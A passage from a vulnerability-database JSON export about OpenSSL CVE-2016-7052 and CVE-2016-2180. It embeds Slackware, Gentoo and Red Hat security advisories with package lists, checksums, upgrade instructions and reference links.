is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] openssl (SSA:2016-270-01)\n\nNew openssl packages are available for Slackware 14.2 and -current to\nfix a security issue. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.2j-i586-1_slack14.2.txz: Upgraded. \n This update fixes a security issue:\n Missing CRL sanity check (CVE-2016-7052)\n For more information, see:\n https://www.openssl.org/news/secadv/20160926.txt\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7052\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.2j-i586-1_slack14.2.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2j-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2j-i586-1_slack14.2.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2j-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2j-x86_64-1_slack14.2.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2j-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2j-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2j-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2j-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\ncf3e90f91b35ee96f5a900e5f2ec8fd5 openssl-1.0.2j-i586-1_slack14.2.txz\n31cc46351fdd4c487f75abdbfcd696e7 openssl-solibs-1.0.2j-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 packages:\n333fd278752b5f04a805aeabd77f28c4 openssl-1.0.2j-x86_64-1_slack14.2.txz\n6b25daf23b1cfc59351308b9c11e830a openssl-solibs-1.0.2j-x86_64-1_slack14.2.txz\n\nSlackware -current packages:\n98337bdfe00f04be784953fee5c023ca a/openssl-solibs-1.0.2j-i586-1.txz\n3cd05a7ed655e7f51f652a31b9b908e7 n/openssl-1.0.2j-i586-1.txz\n\nSlackware x86_64 -current packages:\n6907d9a091ace959d8f04aa92cd7e5f6 a/openssl-solibs-1.0.2j-x86_64-1.txz\n4017d82d5c4c370ab6850a5d623d321a n/openssl-1.0.2j-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.2j-i586-1_slack14.2.txz openssl-solibs-1.0.2j-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAlfpZcsACgkQakRjwEAQIjPMMACbB1R3zcPgLf11KPr1jtmRE7PN\nBvgAnjd81wwT0k1DTOieELSStonzadsk\n=AuZJ\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2016-7052" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "BID", "id": "93171" }, { "db": "VULMON", "id": "CVE-2016-7052" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138863" } ], "trust": 2.16 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-7052", "trust": 3.0 }, { "db": "BID", "id": "93171", "trust": 2.0 }, { "db": "SECTRACK", "id": "1036885", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-19", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10171", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU99474230", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004996", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4645", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201609-599", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-7052", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138863", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-7052" }, { "db": "BID", "id": "93171" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138863" }, { "db": "NVD", "id": "CVE-2016-7052" }, { "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "id": "VAR-201609-0481", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3797576935714285 }, "last_update_date": "2023-12-18T11:18:09.171000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Add some sanity checks when checking CRL scores", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=6e629b5be45face20b4ca71c4fcbfed78b864a2e" }, { "title": "Missing CRL sanity check (CVE-2016-7052)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160926.txt" }, { "title": "SUSE-SU-2016:2470", "trust": 0.8, "url": "https://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64377" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/09/26/openssl_patches_last_weeks_patch/" }, { "title": "Arch Linux Advisories: [ASA-201609-28] lib32-openssl: denial of service", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-28" }, { "title": "Arch Linux Advisories: [ASA-201609-30] openssl: denial of service", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-30" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-7052" }, { "title": "Red Hat: CVE-2016-7052", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-7052" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Tenable Security Advisories: [R6] SecurityCenter 5.4.1 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-19" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-7052 " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/openssl-fixes-critical-bug-introduced-by-latest-update/120851/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-7052" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-476", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "NVD", "id": "CVE-2016-7052" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "https://www.openssl.org/news/secadv/20160926.txt" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/93171" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10171" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036885" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-19" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:27.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=6e629b5be45face20b4ca71c4fcbfed78b864a2e" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7052" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu99474230/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-7052" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=6e629b5be45face20b4ca71c4fcbfed78b864a2e" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914246-1.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4645/" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21996181" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/476.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://threatpost.com/openssl-fixes-critical-bug-introduced-by-latest-update/120851/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49228" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-7052" }, { "db": "BID", "id": "93171" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138863" }, { "db": "NVD", "id": "CVE-2016-7052" }, { "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-7052" }, { "db": "BID", "id": "93171" }, { "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138863" }, { "db": "NVD", "id": "CVE-2016-7052" }, { "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-26T00:00:00", "db": "VULMON", "id": "CVE-2016-7052" }, { "date": "2016-09-26T00:00:00", "db": "BID", "id": "93171" }, { "date": "2016-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-09-26T23:23:00", "db": "PACKETSTORM", "id": "138863" }, { "date": "2016-09-26T19:59:07.533000", "db": "NVD", "id": "CVE-2016-7052" }, { "date": "2016-09-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-7052" }, { "date": "2017-12-19T22:37:00", "db": "BID", "id": "93171" }, { "date": "2016-12-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004996" }, { "date": "2023-11-07T02:34:13.277000", "db": "NVD", "id": "CVE-2016-7052" }, { "date": "2022-08-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-599" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-599" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/x509/x509_vfy.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004996" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-599" } ], "trust": 0.6 } }
var-201608-0006
Vulnerability from variot
The TS_OBJ_print_bio function in crypto/ts/ts_lib.c in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation in OpenSSL through 1.0.2h allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted time-stamp file that is mishandled by the "openssl ts" command. Supplementary information : CWE Vulnerability type by CWE-125: Out-of-bounds Read ( Read out of bounds ) Has been identified. OpenSSL is prone to a local denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
